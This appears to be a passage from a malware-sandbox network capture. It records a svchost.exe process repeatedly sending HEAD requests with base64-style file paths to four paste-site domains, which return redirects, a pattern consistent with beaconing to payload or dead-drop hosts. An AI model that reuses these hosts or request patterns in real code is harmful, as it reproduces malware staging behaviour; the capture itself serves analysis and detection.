                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HIpDID9ZOQ3da1Wjk0oNywcHfJ711VxUl1i7mSrHFdX0ViUp%2F1wQ1zTUn9ePWsORjQ1t5LbuR63IDyOSOSH0bKnyAEF8li0GdHaQKtKZ2FIWROV7WMD2xE2vwBm9jZhQpwQm"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc456f8f1c358-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1677&min_rtt=1677&rtt_var=838&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=91&delivery_rate=0&cwnd=153&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              125192.168.2.750343172.67.198.113807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:27:21.739140987 CET80OUTHEAD /STB/cGFzdGVzbmFwM.txt HTTP/1.1
                                                              Host: pastesnap.com
                                                              Connection: close
                                                              Jan 12, 2025 09:27:22.195008039 CET878INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:22 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:22 GMT
                                                              Location: https://pastesnap.com/STB/cGFzdGVzbmFwM.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gLTuH%2BgIK%2BCbyn%2Bi4eyQ%2FSRxz%2BomlZgy3Qx43MEbnevFzlSO9XP1vhg6d%2FYv%2BtOtR%2B7yEFLH%2FHek1fSRnFazsVoSql4eki0ZCTiHwUzXqjOpabgTw0%2FB%2FFml80qQMcO%2B"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc457697b78e7-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1992&min_rtt=1992&rtt_var=996&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=80&delivery_rate=0&cwnd=232&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              126192.168.2.750348172.67.176.186807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:27:22.201083899 CET87OUTHEAD /STB/dGV4dGJpbnZhdWx0M.txt HTTP/1.1
                                                              Host: textbinvault.com
                                                              Connection: close
                                                              Jan 12, 2025 09:27:22.687138081 CET875INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:22 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:22 GMT
                                                              Location: https://textbinvault.com/STB/dGV4dGJpbnZhdWx0M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fqN5ASdC5UoQVas3TZlMYJ%2BNIDTAEiw5x8%2FPu0L69B76YmlGMN864aKfVSsEJI9u2kfKKPAP3pMwrnmj10XXiCmTx2fSTiJFihW4fZAog%2FtZKFNNqy%2FJ7yp%2BjfKCxcKbAgxE"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc45a79e2efa3-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1894&min_rtt=1894&rtt_var=947&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=87&delivery_rate=0&cwnd=120&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              127192.168.2.750350188.114.97.3807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:27:22.600091934 CET86OUTHEAD /STB/d2F2ZXBhc3NhZ2U=M.txt HTTP/1.1
                                                              Host: wavepassage.cfd
                                                              Connection: close
                                                              Jan 12, 2025 09:27:23.078497887 CET868INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:23 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:23 GMT
                                                              Location: https://wavepassage.cfd/STB/d2F2ZXBhc3NhZ2U=M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7vjE9TOt5Ij1C2XtC4tvvVNY4owSRMJFfvXpSx2J%2F9Zp9VC55kJMLUXsDGyiKj1ClblBz6obf4uWPS9cN7luUesGhRdavi4nXa9KA2T2H85qgoXYJLG0vjheXcFwoGgTFaI%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc45ceb7d8c84-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1803&min_rtt=1803&rtt_var=901&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=86&delivery_rate=0&cwnd=174&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              128192.168.2.750352104.21.64.1807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:27:22.693713903 CET91OUTHEAD /STB/c2VjdXJldGV4dHdlYg==M.txt HTTP/1.1
                                                              Host: securetextweb.cc
                                                              Connection: close
                                                              Jan 12, 2025 09:27:23.140355110 CET877INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:23 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:23 GMT
                                                              Location: https://securetextweb.cc/STB/c2VjdXJldGV4dHdlYg==M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Tp270G49909mn8TgL60VK%2FkKW8fv7a8v0xv2Uy6x%2Fsu7yvFKpaxoUswzQB41Qd5WbQyFVlFScG8NgXhr2Q%2FHt98GUm543gkxty02YJRXMnW1emkQRlimJ3EVPcJslSS%2Fv7NI"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc45d59014414-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1758&min_rtt=1758&rtt_var=879&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=91&delivery_rate=0&cwnd=178&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              129192.168.2.750354172.67.198.113807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:27:23.085103035 CET80OUTHEAD /STB/cGFzdGVzbmFwM.txt HTTP/1.1
                                                              Host: pastesnap.com
                                                              Connection: close
                                                              Jan 12, 2025 09:27:23.561980009 CET866INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:23 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:23 GMT
                                                              Location: https://pastesnap.com/STB/cGFzdGVzbmFwM.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jwiyjHda8MPCbxcocMZ5%2BCB8vBaICv5qmgV3AYkDm3ofeqrQc0%2F0QdQuF27llX%2BAFngxqn0q81f%2BDUqaSCSPwvCmCXICmz%2BLjCo3yZUf2b60BuA%2B40DSGLlT0cvdVOZ9"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc45fe9dd0cb2-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1453&min_rtt=1453&rtt_var=726&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=80&delivery_rate=0&cwnd=150&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              130192.168.2.750359172.67.176.186807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:27:23.568573952 CET87OUTHEAD /STB/dGV4dGJpbnZhdWx0M.txt HTTP/1.1
                                                              Host: textbinvault.com
                                                              Connection: close
                                                              Jan 12, 2025 09:27:24.042653084 CET873INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:23 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:23 GMT
                                                              Location: https://textbinvault.com/STB/dGV4dGJpbnZhdWx0M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Rf%2F9UZn9nNxDDNHcQ11EGEj6%2BAssP2wPuC29D3C7QyQwcfFGgmcA4GRBURCdo6cm04OkMwfauJNgR%2BnGIJarKS1oZ9dOSlFiSGfSDyGvcqv9ja1GqZeg5i%2BSgtqMnI1xx06l"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc462ec4943e0-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1589&min_rtt=1589&rtt_var=794&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=87&delivery_rate=0&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              131192.168.2.750361188.114.97.3807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:27:23.623661995 CET86OUTHEAD /STB/d2F2ZXBhc3NhZ2U=M.txt HTTP/1.1
                                                              Host: wavepassage.cfd
                                                              Connection: close
                                                              Jan 12, 2025 09:27:24.096158028 CET879INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:24 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:24 GMT
                                                              Location: https://wavepassage.cfd/STB/d2F2ZXBhc3NhZ2U=M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QJkz927y1LokFB%2B2ggUFybLb5TdOnRDFDTSDlwrfcgCKd%2Fhcl9oa09PtV6Ynd8rHnRFijL1KlVxW5LSauReoB0sPuMO%2B5%2FdDcw%2B5m%2FnJqbnwT1HYx8ZEoKKWWQozCfhWtrU%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc4634e3d422d-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2094&min_rtt=2094&rtt_var=1047&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=86&delivery_rate=0&cwnd=230&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              132192.168.2.750363104.21.64.1807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:27:24.049115896 CET91OUTHEAD /STB/c2VjdXJldGV4dHdlYg==M.txt HTTP/1.1
                                                              Host: securetextweb.cc
                                                              Connection: close
                                                              Jan 12, 2025 09:27:24.528991938 CET873INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:24 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:24 GMT
                                                              Location: https://securetextweb.cc/STB/c2VjdXJldGV4dHdlYg==M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EOQ2qjizsd7lP8ZyPCBqgmog6dTBplEN88%2BuBXg6FfnmnAgRMK7WkAnhsh6xYUlw5LdRlZBZJlDfKYq3MTTSGfSldEvvpy0stiaWaTcaF6%2FVMuVp6kZfEMatmKdkDiml2JKL"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc465fe4ec358-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1655&min_rtt=1655&rtt_var=827&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=91&delivery_rate=0&cwnd=153&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              133192.168.2.750365172.67.198.113807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:27:24.102838039 CET80OUTHEAD /STB/cGFzdGVzbmFwM.txt HTTP/1.1
                                                              Host: pastesnap.com
                                                              Connection: close
                                                              Jan 12, 2025 09:27:24.561486006 CET860INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:24 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:24 GMT
                                                              Location: https://pastesnap.com/STB/cGFzdGVzbmFwM.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=S%2FqcwqU7Ex6UgsRAIjZuTde8n59xmHSg%2FqXpGtME7NpTh7YnvkY7N1HnAIE4qAX1RdOiVHeOXEk9UnW1at13jtfglL3kVKjM396UIEjwdEtI%2BDSLjaAYgKvcfV3iMr1g"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc46629526a58-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1669&min_rtt=1669&rtt_var=834&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=80&delivery_rate=0&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              134192.168.2.750370172.67.176.186807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:27:24.567773104 CET87OUTHEAD /STB/dGV4dGJpbnZhdWx0M.txt HTTP/1.1
                                                              Host: textbinvault.com
                                                              Connection: close
                                                              Jan 12, 2025 09:27:25.106439114 CET871INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:25 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:25 GMT
                                                              Location: https://textbinvault.com/STB/dGV4dGJpbnZhdWx0M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LPkLz73Qf7Re9GvuSzmLC5epbvfVAS9GCfZM3XS%2F9bS3V2g4fFMmRNQ1oLPqrF9tPBuytaSHjc7MI1d4A9cv9saS%2BqWLuU%2BKbAko2aiIgo9GjAF5slNHxqnHm7BU7tic7F82"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc4698c7a42fc-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1544&min_rtt=1544&rtt_var=772&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=87&delivery_rate=0&cwnd=186&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              135192.168.2.750372188.114.97.3807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:27:25.033137083 CET86OUTHEAD /STB/d2F2ZXBhc3NhZ2U=M.txt HTTP/1.1
                                                              Host: wavepassage.cfd
                                                              Connection: close
                                                              Jan 12, 2025 09:27:25.508781910 CET866INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:25 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:25 GMT
                                                              Location: https://wavepassage.cfd/STB/d2F2ZXBhc3NhZ2U=M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nizsywT2DTZ0HNbtUubXVmZXX9f1ZAnDtPQZQsrh7iFS2UwOwDAGx6KS8GO2qXoJoao3rLnGKsQtWG6t3vYDniKQDR3QkQ8Frv9OUU5cGoLM8FZb0xhigoUH4fdNV8zVphg%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc46c1e1a5590-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1619&min_rtt=1619&rtt_var=809&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=86&delivery_rate=0&cwnd=140&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              136192.168.2.750374104.21.64.1807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:27:25.121336937 CET91OUTHEAD /STB/c2VjdXJldGV4dHdlYg==M.txt HTTP/1.1
                                                              Host: securetextweb.cc
                                                              Connection: close
                                                              Jan 12, 2025 09:27:25.582278013 CET873INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:25 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:25 GMT
                                                              Location: https://securetextweb.cc/STB/c2VjdXJldGV4dHdlYg==M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hOH32z1mJJxlWJWp3R2RfflY0baplaeLFbwXx0US031dyLF03Qd97yDm43WeBurFCwIlznOX0rMBHFtUSAM1X%2FCbA%2Fboy0sfk7yYBcVLnLgZz1MHRQ0esrH1dIpETnxX2ABu"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc46c8ac64414-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1772&min_rtt=1772&rtt_var=886&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=91&delivery_rate=0&cwnd=178&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              137192.168.2.750376172.67.198.113807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:27:25.515604019 CET80OUTHEAD /STB/cGFzdGVzbmFwM.txt HTTP/1.1
                                                              Host: pastesnap.com
                                                              Connection: close
                                                              Jan 12, 2025 09:27:25.968350887 CET862INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:25 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:25 GMT
                                                              Location: https://pastesnap.com/STB/cGFzdGVzbmFwM.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cpd6dgINEwJOUZvfCBdF5iN7DgTvMtnpsUJFrps5doIZ2jtq64Yj4JgIA6SBNf%2FEP6i3pnacGGD66s%2BSP76kBJt0WG2x%2Beuoh9VLhXjITmsxuRSta4vdPWC%2BGD5sG6LG"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc46ef9025e79-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1647&min_rtt=1647&rtt_var=823&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=80&delivery_rate=0&cwnd=223&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              138192.168.2.750381172.67.176.186807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:27:25.974822998 CET87OUTHEAD /STB/dGV4dGJpbnZhdWx0M.txt HTTP/1.1
                                                              Host: textbinvault.com
                                                              Connection: close
                                                              Jan 12, 2025 09:27:26.428056955 CET875INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:26 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:26 GMT
                                                              Location: https://textbinvault.com/STB/dGV4dGJpbnZhdWx0M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DVvmvsT%2BNaKYGKKY7cZy8ikvuaaadjEsCk9J1wKjvparXhEibSBf7JEpMm7%2BVWLJ12agSvhvv%2FybUwL%2BE%2F9FzCshmW25VEHC7AaSQUDRav22j0UI5z9DfphArutTZQTxqQwd"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc471dff34386-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1545&min_rtt=1545&rtt_var=772&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=87&delivery_rate=0&cwnd=244&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              139192.168.2.750383188.114.97.3807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:27:26.079870939 CET86OUTHEAD /STB/d2F2ZXBhc3NhZ2U=M.txt HTTP/1.1
                                                              Host: wavepassage.cfd
                                                              Connection: close
                                                              Jan 12, 2025 09:27:26.560540915 CET874INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:26 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:26 GMT
                                                              Location: https://wavepassage.cfd/STB/d2F2ZXBhc3NhZ2U=M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mcw8jGtsBdqBB%2FHy%2FB9J3xl7QhGCaJCO3QtUwkVYNroQgtCtk3X9jtn%2BNoadFil4bMfWhk5LvIxb15AtJDljbQWbJKjpG1RBSOvG41ZvKcq%2BnSfYjOSVdnUv3HeYwCW6Tn8%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc472ad06423d-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1658&min_rtt=1658&rtt_var=829&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=86&delivery_rate=0&cwnd=184&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              140192.168.2.750385104.21.64.1807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:27:26.434784889 CET91OUTHEAD /STB/c2VjdXJldGV4dHdlYg==M.txt HTTP/1.1
                                                              Host: securetextweb.cc
                                                              Connection: close
                                                              Jan 12, 2025 09:27:26.884705067 CET875INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:26 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:26 GMT
                                                              Location: https://securetextweb.cc/STB/c2VjdXJldGV4dHdlYg==M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VDu5eWdH37eJaFoSYft1tBDKJBkiCUfgTIhDIABQp2kaa4Tr4wM0GXRd7AZVGOtnvG3XV2t6P%2FdMmVOImub3%2B9dK60746npEfMfXf4m7c3gyVMMeHJ7yTO1xay%2FdoYkpgSEc"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc474bd82de95-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1603&min_rtt=1603&rtt_var=801&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=91&delivery_rate=0&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              141192.168.2.750387172.67.198.113807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:27:26.566898108 CET80OUTHEAD /STB/cGFzdGVzbmFwM.txt HTTP/1.1
                                                              Host: pastesnap.com
                                                              Connection: close
                                                              Jan 12, 2025 09:27:27.024802923 CET860INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:26 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:26 GMT
                                                              Location: https://pastesnap.com/STB/cGFzdGVzbmFwM.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=o%2F0d5feoSqZzLDCwwxYpL0ispsiVy0dFoN0AQD9mrhrBwyvtBpWNcKwkA56%2B53o0xBEdDw7wFEy2DggOPeZ6Q7lyp5CJta7E46RqB%2BI7ztsxP1ipLqsHwIGEO1g2bGuZ"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc47588634314-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1650&min_rtt=1650&rtt_var=825&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=80&delivery_rate=0&cwnd=186&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              142192.168.2.750392172.67.176.186807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:27:27.032485962 CET87OUTHEAD /STB/dGV4dGJpbnZhdWx0M.txt HTTP/1.1
                                                              Host: textbinvault.com
                                                              Connection: close
                                                              Jan 12, 2025 09:27:27.488215923 CET867INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:27 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:27 GMT
                                                              Location: https://textbinvault.com/STB/dGV4dGJpbnZhdWx0M.txt
